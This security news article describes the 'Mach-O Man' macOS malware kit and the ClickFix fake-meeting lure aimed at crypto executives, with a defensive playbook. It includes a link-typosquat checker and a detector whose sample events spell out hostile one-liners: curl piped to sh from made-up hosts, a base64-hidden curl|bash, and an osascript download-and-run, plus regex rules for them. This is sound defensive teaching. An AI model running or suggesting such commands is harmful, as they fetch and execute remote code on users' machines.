Imagine the scene: you're head of engineering at a Brazilian exchange, and you receive an urgent Telegram invite to a Google Meet call with a Singapore fund. The link takes you to a page identical to the official one, where the video freezes because of "a macOS audio problem". The page politely asks you to paste a command into Terminal to "fix the driver". You're a crypto exec, you've been on a Mac for ten years, you've run a thousand Terminal commands. You paste. Twenty seconds later, your entire Keychain, with exchange passwords, API keys, Vercel session tokens and bank cookies, is in a private Telegram channel controlled by Pyongyang.
This scenario stopped being hypothetical last week. On April 21, 2026, Bitso's Quetzal security team, in partnership with the ANY.RUN analysis platform, published the discovery of a new modular malware kit for macOS nicknamed Mach-O Man — attributed, with high confidence, to the Famous Chollima unit of the Lazarus Group, the crypto operations arm of North Korean intelligence.
The story, in short: the same group that stole $1.5 billion from Bybit in February 2025 has now changed targets. Instead of hunting bridge library developers or multisig wallet operators, Lazarus is going after executives. And the preferred vector is the corporate laptop everyone swore was secure: the MacBook.
What is Mach-O Man, technically
The name is a reference to macOS's native executable format (Mach-O) and to the wrestler "Macho Man" Randy Savage. Behind the joke is one of the cleanest kits Lazarus has ever deployed on Mac. Three characteristics define Mach-O Man:
- Modular. It's not a single binary. It's stages — dropper, infostealer, C2 beacon, self-destruct — that can be combined depending on the target.
- No heavy persistence. Unlike classic malware that plants LaunchDaemons to survive reboots, Mach-O Man executes, exfiltrates and can self-destruct in minutes. It was designed for surgical attacks, not long-term control.
- Exfiltration via Telegram. The collected data (browser credentials, session cookies, Keychain entries, terminal history, local crypto wallet files) is compressed and sent to private Telegram channels controlled by the operators. Using a public messaging service instead of dedicated C2 infrastructure leaves less forensic footprint and nothing for defenders to take down.
The kit also includes a self-destruction script that uses native system commands to remove the malware and cover its tracks, bypassing user confirmation dialogs. When the victim notices something is wrong, the binary is already gone.
The attack in practice: ClickFix, the perfect social engineering
The technical hook is secondary. The real attack is psychological, and it's called ClickFix. The sequence is always similar:
- First contact via Telegram or LinkedIn, personalized. The attacker impersonates a fund head, exchange BD head, M&A recruiter or reporter from a recognized outlet. The message has real context — it picks data from recent posts, events the target actually attended, deals the company announced.
- Invite for urgent call. "Today, 15 minutes from now, it's time-sensitive." The link looks like Zoom, Teams or Google Meet. It's not. It's an identical replica hosted on a similar-looking domain (typosquat) or hijacked legitimate CDN.
- Staged bug in the call. The page simulates an audio or camera problem. A modal appears saying: "we detected a problem with your audio on macOS. Paste the command below in Terminal to fix it."
- The command. Usually a one-liner that invokes curl or osascript to download and execute the Mach-O Man dropper. In some observed cases the command is base64-obfuscated so that even a technical user doesn't recognize at a glance what it does.
- Silent exfiltration. The binary runs with the user's own privileges (no sudo needed), reads the Keychain, copies sensitive data and sends it to Telegram. In corporate environments without macOS-specific EDR, no alert fires at all.
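The second step of that sequence, the fake meeting link, is the one moment where a plain mechanical check still works before any social pressure kicks in. The following is an added example, not code from the Bitso/ANY.RUN report, of a small classifier that accepts a meeting URL only when its registrable domain is one of the real services and otherwise names the trick it sees: the legitimate name embedded as a subdomain of another domain, a brand word in an unrelated domain, a short-edit-distance typosquat, or a punycode/homoglyph host. The allow-list, the brand tokens and every domain in the assertions are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Hosts of the real meeting services. Assumption for this example: replace with the
# services your company actually uses, and keep the list short and exact.
LEGIT_MEETING_HOSTS = {"meet.google.com", "zoom.us", "teams.microsoft.com"}
# Brand words that should never appear in a host outside the legitimate domains.
BRAND_TOKENS = ("google", "microsoft", "teams", "zoom")


def registrable_domain(host):
    """Last two labels of a host ('us02web.zoom.us' -> 'zoom.us'). Simplification:
    production code should use the Public Suffix List so 'co.uk'-style suffixes work."""
    labels = host.split(".")
    return ".".join(labels[-2:])


LEGIT_DOMAINS = {registrable_domain(h) for h in LEGIT_MEETING_HOSTS}


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_meeting_link(url):
    """Return 'ok' for a link on a known meeting domain, otherwise a short reason not to click."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    host = (parts.hostname or "").rstrip(".")   # .hostname is already lower-cased
    if not host:
        return "no host"
    if parts.scheme != "https":
        return "not https"
    # Punycode or raw non-ASCII labels: the classic homoglyph trick (Cyrillic 'о' in 'gооgle').
    if "xn--" in host or any(ord(c) > 127 for c in host):
        return "non-ASCII or punycode host (possible homoglyph)"
    if registrable_domain(host) in LEGIT_DOMAINS:
        return "ok"
    # The real name used as a subdomain of the attacker's domain: meet.google.com.cdn-invite.net
    for legit in LEGIT_MEETING_HOSTS:
        if legit in host:
            return f"legitimate name embedded in another domain ({host})"
    # Brand word inside a domain the brand does not own: meet-google.com, zoom-us.com
    for brand in BRAND_TOKENS:
        if brand in host:
            return f"brand name '{brand}' in an unrelated domain ({host})"
    # Small edit distance to a real domain: g00gle.com, zoon.us
    for legit in LEGIT_DOMAINS:
        if levenshtein(registrable_domain(host), legit) <= 2:
            return f"typosquat of {legit} ({host})"
    return f"unknown host: {host}"


if __name__ == "__main__":
    for link in ("https://meet.google.com/abc-defg-hij",
                 "https://meet-google.com/abc-defg-hij",
                 "https://meet.google.com.cdn-invite.net/abc"):
        print(link, "->", classify_meeting_link(link))
```

The check is deliberately strict: anything that is not an exact known domain is a reason to stop and confirm through a second channel, which is the same rule the playbook below gives for the invite itself. The registrable-domain shortcut and the two-character edit-distance threshold are tuning choices for this example, not constants from the report.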
The ClickFix technique has been seen in campaigns against traditional finance since 2024, but according to the report this is the first time a tier 1 APT actor has operationalized it at scale against crypto.
Lazarus in 2026: a trail of $2 billion
Mach-O Man doesn't emerge in a vacuum. It's the natural evolution of a sequence of operations that, over the last eighteen months, made North Korea the world's largest state actor in crypto theft. The known numbers:
- February 2025 — Bybit: $1.5 billion drained via malicious JavaScript injection into the Safe{Wallet} interface, after a dev had his machine compromised. The largest crypto heist in history.
- April 2026 — Drift Protocol: $285 million siphoned in a social engineering operation that took six months of infiltration. Attributed to the UNC4736 subunit — our coverage in Drift Confirms: $285M Hack Was 6-Month North Korean Intelligence Operation.
- April 2026 — KelpDAO: $293 million in exploit, of which Arbitrum froze $71 million by security council action — see Arbitrum Freezes $71 Million From Kelp Hacker.
Blockchain security firm CertiK attributed both Drift and Kelp to Famous Chollima, the same unit now operating Mach-O Man. The pattern is clear: in 2024, Lazarus attacked cross-chain bridges; in 2025, it moved to the infrastructure supply chain (Bybit via Safe{Wallet}); in 2026, it's hunting people. That's not tactical regression. It's sophistication.
For the complete picture of the month, it's worth reviewing our consolidated coverage in DeFi's Black April: $606 Million in Hacks in Just 18 Days.
Why the focus is macOS now
For years, the "Mac is secure" narrative was a combo of three things: lower market share (less incentive for attackers), Unix-like architecture with sandboxing, and Gatekeeper + notarization blocking unsigned binaries. That balance broke.
Three factors pushed Lazarus toward macOS:
- Concentration of targets. Crypto execs and engineers use Mac at a much higher proportion than the overall market average. A single CTO MacBook at an exchange is worth more, in terms of damage potential, than a hundred random corporate PCs.
- Less mature defenses. Corporate EDRs (CrowdStrike, SentinelOne) have much deeper Windows coverage than macOS coverage. Corporate SIEMs rarely have specific rules for osascript, Keychain modifications or anomalous curl | sh usage.
- ClickFix bypasses Gatekeeper. When the user voluntarily pastes and executes the command in their own Terminal, none of the notarization protections apply. The attack doesn't download a packaged app; it downloads a script. And a file fetched by curl never carries the quarantine attribute that Gatekeeper checks, so even the binary the script drops is executed without ever being evaluated.
The timing also aligns with the expansion of Latin America's crypto ecosystem. As Brazilian exchanges come under Central Bank regulation, the volume of assets under local custody has grown, and with it the interest of state actors in compromising the people who run those houses.
Defensive playbook for execs and crypto teams
The practical part. If you're a CEO, CTO, security head or senior dev at any crypto operation, these are the actions that make sense to execute this week, not "next quarter":
For the individual exec
- Golden rule: never paste a command into Terminal from a web page. If the "solution" to your audio problem is running a script, it's malware. Always. No exceptions. An audio or camera problem in a browser meeting is never fixed by a shell command.
- Meeting invites coming via Telegram or social network DMs are suspicious by default. Confirm via secondary channel (corporate email, verified WhatsApp) before clicking any link. It takes 30 seconds.
- Enable FileVault and review your Keychain. Delete old credentials you no longer use. Mach-O Man doesn't differentiate between current and obsolete; it takes everything. Note that FileVault protects the disk at rest, not an unlocked session, so it's the Keychain cleanup that limits what a stealer running as you can actually take.
- Rotate critical passwords and API keys every 90 days. Yes, it's annoying. But it reduces the blast radius of any compromise to a quarter.
- Use a password manager other than Keychain for the most sensitive secrets (1Password, Bitwarden with a strong master key). Mach-O Man specifically targets Keychain. This only helps if the vault is locked when you're not using it; an unlocked vault on a compromised machine is as exposed as Keychain.
For the company
- Install EDR with real macOS coverage. CrowdStrike Falcon, SentinelOne Singularity and Jamf Protect have detection for behaviors typical of Mach-O Man: script execution via osascript, anomalous Keychain access, outbound connections to the Telegram API.
- Block the Telegram API at the corporate firewall, except on machines that genuinely need it. Exfiltration via Telegram is a signature of Mach-O Man.
- Train your executive team on ClickFix. Everyone recognizes traditional phishing. ClickFix is new and specifically designed for people with technical background.
- MFA via hardware key (YubiKey), not SMS or app. Session tokens stolen from Keychain lose value if the next authentication requires a physical tap. The caveat: a stolen session cookie stays valid until it expires or is revoked, so pair hardware MFA with short session lifetimes and revoke all sessions the moment a compromise is suspected.
- Segregate work wallets from personal wallets. If the personal MacBook is compromised, the corporate key in a separate hardware wallet survives.
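Both the "less mature defenses" point above (SIEMs without rules for osascript or curl | sh) and the EDR item in this list come down to the same question: what does a ClickFix one-liner look like in process telemetry, and can you still see it through a layer of base64? The following is an added example, not code from the report or from any EDR vendor, of detection logic that scans process-execution events for the patterns the article describes: a downloader piped into a shell, downloader output run via command substitution, base64 decoded into a shell, and osascript running a shell command. Base64 blobs are decoded and re-scanned, so the obfuscated variant is flagged for the same reason as the plain one. The event shape (parent app plus command line) and every URL and command in the sample are constructed for this example.

```python
import base64
import re

# Process-execution telemetry shape assumed here (constructed for this example): one dict
# per exec event with the parent app and the full command line, the way osquery's
# process_events table or an EDR would hand it to a SIEM. All URLs are made up.
_PAYLOAD = "curl -fsSL https://drv.example/stage1 | bash"   # what the base64 blob hides
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmdline": "ls -la ~/Projects"},
    {"parent": "Terminal", "cmdline": "git pull --rebase"},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://example.com/info.json | jq ."},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://fix-audio.example/macfix.sh | sh"},
    {"parent": "Terminal", "cmdline": "echo " + base64.b64encode(_PAYLOAD.encode()).decode()
                                      + " | base64 -D | sh"},
    {"parent": "Terminal", "cmdline": "bash -c \"$(curl -fsSL https://fix-audio.example/audio)\""},
    {"parent": "Terminal", "cmdline": "osascript -e 'do shell script \"curl -o /tmp/.u "
                                      "https://drv.example/u; chmod +x /tmp/.u; /tmp/.u\"'"},
]

SHELL = r"(?:sudo\s+)?(?:sh|bash|zsh)\b"
RULES = [
    ("downloader piped into a shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*" + SHELL)),
    ("downloader output executed via command substitution",
     re.compile(r"\$\(\s*(?:curl|wget)\b")),
    ("base64-decoded data piped into a shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + SHELL)),
    ("osascript running a shell command",
     re.compile(r"\bosascript\b.*do shell script", re.IGNORECASE)),
    ("osascript asking for admin rights (password prompt)",
     re.compile(r"with administrator privileges", re.IGNORECASE)),
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_blobs(cmdline):
    """Yield base64 runs in the command line that decode to readable text."""
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:          # bad padding, not base64, or not UTF-8
            continue
        if text and all(c.isprintable() or c in "\n\t" for c in text):
            yield text


def analyze(cmdline, depth=0):
    """Return the reasons (possibly empty) a command line looks like a ClickFix one-liner.
    Base64 blobs are decoded and re-analyzed, so obfuscation does not hide the curl | sh."""
    reasons = [name for name, rx in RULES if rx.search(cmdline)]
    if depth < 2:                   # follow up to two layers of base64 wrapping
        for inner in decoded_blobs(cmdline):
            reasons += ["(base64-decoded) " + r for r in analyze(inner, depth + 1)]
    return reasons


def scan_events(events):
    """Return [(cmdline, reasons)] for every event matching at least one rule."""
    hits = []
    for ev in events:
        reasons = analyze(ev["cmdline"])
        if reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in scan_events(SAMPLE_EVENTS):
        print("ALERT", reasons, "::", cmdline)
```

Run against the sample, the three benign commands (including a legitimate curl | jq) produce nothing and the four ClickFix-style lines each get a reason; the base64 one gets two, the outer "base64 -D | sh" and the inner "downloader piped into a shell" recovered from the blob. In production this should alert rather than block, because developers do run curl | sh on purpose (package installers), and confidence goes up when the parent is Terminal or iTerm2, the shell was spawned within seconds of a browser page load, and the host is not on an allow-list of your own tooling domains.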
What this means for Brazil
Two things.
First, Brazil is on the radar. Bitso's Quetzal team itself was the first to identify the campaign — which only makes sense if attack traffic passed through LatAm infrastructure or customers. Executives at Brazilian exchanges, digital asset fintechs and funds are explicitly among the targets.
Second, the local ecosystem has its own aggravating factors. As we covered in Trojan GoPix Evolves, malware adapted to the Brazilian context (Pix, bank transfers, national digital banks) is already on the scene. The combination of a Lazarus attack against an exec with a local banking trojan already on the machine is devastating. Crypto money exits via Keychain exfiltration; fiat money exits via fraudulent Pix. On the same day.
And there's a third, less obvious point: the wave of deepfake attacks against biometric KYC in March and April creates perverse synergy with Mach-O Man. If the attacker steals your credentials via Mach-O Man and then passes 2FA biometric verification via deepfake with your photo from the internet, the combo bypasses all defense layers of an average exchange.
The context: targeted phishing rose 1,400% in the first two months of 2026. Mach-O Man is just the most sophisticated tip of a macro trend.
The ON3X perspective
Three takeaways to close.
One: crypto security in 2026 is a human problem, not a technical one. Every high-impact attack this year started with a person — dev, exec, operator. Protocols are more audited than ever. It's the human that remains the weak link, and state actors know this well before we do.
Two: "Mac is secure" died on April 21, 2026. The digital hygiene that Windows execs internalized two decades ago now needs to be replicated in the Apple ecosystem. It's not paranoia, it's realism.
Three: institutional custody matters. Regulated platforms that segregate assets, operate distributed multisig cold storage and run a 24/7 on-chain monitoring pipeline don't eliminate risk; they transfer it to whoever has the scale to absorb it. An exec who keeps everything in self-custody on their own MacBook became, in 2026, Pyongyang's target of choice.
The question every crypto C-level needs to ask themselves when reading this story is simple: if the next fake Zoom call came to me today, would I paste the command? The honest answer, even for those who think they wouldn't, usually is "it depends on the rush and who sent it". That's exactly why ClickFix works. And that's exactly why Lazarus is making billions.
